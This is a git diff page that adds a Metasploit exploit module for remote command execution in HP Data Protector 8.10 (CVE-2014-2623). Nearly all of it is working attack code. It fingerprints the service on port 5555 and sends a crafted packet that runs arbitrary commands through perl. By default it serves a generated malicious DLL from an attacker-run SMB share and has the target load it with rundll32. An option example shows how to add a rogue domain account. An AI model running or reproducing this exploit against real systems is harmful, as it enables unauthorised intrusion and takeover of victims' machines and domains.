modules/exploits/windows/misc/hp_dataprotector_dll_cmd_exec.rb
Matthew Hall
parent
60edda4ff1
commit
c97a3d9e2e
|
|
@ -0,0 +1,156 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: http//metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
Rank = ExcellentRanking
|
||||||
|
include Msf::Exploit::Remote::Tcp
|
||||||
|
include Msf::Exploit::Remote::SMBFileServer
|
||||||
|
include Msf::Exploit::EXE
|
||||||
|
|
||||||
|
def initialize(info={})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'HP Data Protector 8.10 Remote Command Execution',
|
||||||
|
'Description' => %q{
|
||||||
|
A remote command execution is triggered when a crafted command is sent to the Hp Data Protector Manager on TCP Port 5555.
|
||||||
|
},
|
||||||
|
'Author' => [
|
||||||
|
'Christian (Polunchis) Ramirez https://intrusionlabs.org', # POC
|
||||||
|
'Henoch (Chanoc) Barrera https://intrusionlabs.org', # POC
|
||||||
|
'Matthew Hall <hallm@sec-1.com>' # Metasploit Module
|
||||||
|
],
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
[ 'CVE', '2014-2623' ],
|
||||||
|
[ 'URL', 'http://www.exploit-db.com/exploits/34066/'], # POC
|
||||||
|
[ 'URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818'],
|
||||||
|
[ 'URL', 'http://www.sec-1.com/blog/']
|
||||||
|
],
|
||||||
|
'DefaultOptions' =>
|
||||||
|
{
|
||||||
|
'EXITFUNC' => 'thread',
|
||||||
|
},
|
||||||
|
'Privileged' => true,
|
||||||
|
'Platform' => 'win',
|
||||||
|
'Targets' =>
|
||||||
|
[
|
||||||
|
[ 'HP Data Protector 8.10', { 'Offset' => 46 } ],
|
||||||
|
],
|
||||||
|
'DefaultTarget' => 0,
|
||||||
|
'DisclosureDate' => 'Nov 02 2014'))
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
Opt::RPORT(5555),
|
||||||
|
OptString.new('CMD',[false, 'The command to run e.g. net user hacker hacker123 /add /domain']),
|
||||||
|
],
|
||||||
|
self.class)
|
||||||
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
fingerprint = get_fingerprint
|
||||||
|
|
||||||
|
if fingerprint.nil?
|
||||||
|
return Exploit::CheckCode::Unknown
|
||||||
|
end
|
||||||
|
|
||||||
|
print_status("#{peer} - HP Data Protector version #{fingerprint}")
|
||||||
|
|
||||||
|
if fingerprint =~ /HP Data Protector A\.08\.(\d+)/
|
||||||
|
minor = $1.to_i
|
||||||
|
else
|
||||||
|
return Exploit::CheckCode::Safe
|
||||||
|
end
|
||||||
|
|
||||||
|
if minor < 11
|
||||||
|
return Exploit::CheckCode::Appears
|
||||||
|
elsif minor == 12
|
||||||
|
return Exploit::CheckCode::Detected
|
||||||
|
else
|
||||||
|
return Exploit::CheckCode::Detected
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
|
def start_server
|
||||||
|
vprint_status("Generating our malicious dll...")
|
||||||
|
exe = generate_payload_dll
|
||||||
|
|
||||||
|
@exe_file = rand_text_alpha(7) + ".dll"
|
||||||
|
@share = rand_text_alpha(5)
|
||||||
|
|
||||||
|
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
|
||||||
|
@unc = "\\\\#{my_host}\\#{@share}\\#{@exe_file}"
|
||||||
|
vprint_status("About to start SMB Server on: " + @unc)
|
||||||
|
# start_smb_server('UNC Path', 'Payload', 'Name of file to be served')
|
||||||
|
start_smb_server(@unc, exe, @exe_file)
|
||||||
|
end
|
||||||
|
|
||||||
|
def peer
|
||||||
|
"#{rhost}:#{rport}"
|
||||||
|
end
|
||||||
|
|
||||||
|
def get_fingerprint
|
||||||
|
ommni = connect
|
||||||
|
ommni.put(rand_text_alpha_upper(64))
|
||||||
|
resp = ommni.get_once(-1)
|
||||||
|
disconnect
|
||||||
|
|
||||||
|
if resp.nil?
|
||||||
|
return nil
|
||||||
|
end
|
||||||
|
|
||||||
|
Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null
|
||||||
|
end
|
||||||
|
|
||||||
|
def exec_bar(cmd)
|
||||||
|
connect
|
||||||
|
cmd = cmd.gsub("\\", "\\\\\\\\")
|
||||||
|
vprint_status("Sending Command: #{cmd}")
|
||||||
|
cmd_no = target['Offset'] + cmd.length
|
||||||
|
vprint_status("Size is #{cmd_no}")
|
||||||
|
pkt = "\x00\x00\x00"
|
||||||
|
pkt << cmd_no
|
||||||
|
pkt << "\x32\x00\x01\x01\x01\x01\x01\x01\x00\x01\x00\x01"
|
||||||
|
pkt << "\x00\x01\x00\x01\x01\x00\x20\x32\x38\x00\x5c\x70"
|
||||||
|
pkt << "\x65\x72\x6c\x2e\x65\x78\x65\x00\x20\x2d\x65\x73\x79\x73\x74\x65\x6d" # perl -e system('cmd')
|
||||||
|
pkt << "('#{cmd}')" # Executable
|
||||||
|
pkt << "\x00"
|
||||||
|
sock.put(pkt)
|
||||||
|
# In my testing the default timeout (10) isn't enough
|
||||||
|
if datastore['CMD']
|
||||||
|
begin
|
||||||
|
res = sock.get_once(-1, 20)
|
||||||
|
rescue EOFError
|
||||||
|
disconnect
|
||||||
|
return
|
||||||
|
end
|
||||||
|
fail_with(Failure::Unknown, "#{peer} - Expected answer not received... aborting...") unless exec_bar?(res)
|
||||||
|
disconnect
|
||||||
|
else
|
||||||
|
handler
|
||||||
|
disconnect
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def exec_bar?(data)
|
||||||
|
return false if data.blank?
|
||||||
|
data_unpacked = data.unpack("NnVv")
|
||||||
|
data_unpacked.length == 4 && data_unpacked[0] == 8 && data_unpacked[1] == 0xfffe && data_unpacked[2] == 0x36 && data_unpacked[3] == 0
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
if datastore['CMD']
|
||||||
|
print_status("Executing command #{datastore['CMD']}")
|
||||||
|
exec_bar(datastore['CMD'])
|
||||||
|
else
|
||||||
|
start_server
|
||||||
|
print_status("Sending load DLL to #{datastore['RHOST']}:#{datastore['RPORT']} - #{@unc}")
|
||||||
|
sploit = "rundll32.exe #{@unc},"
|
||||||
|
sploit << rand_text_numeric(1)
|
||||||
|
exec_bar(sploit)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
Loading…
Reference in New Issue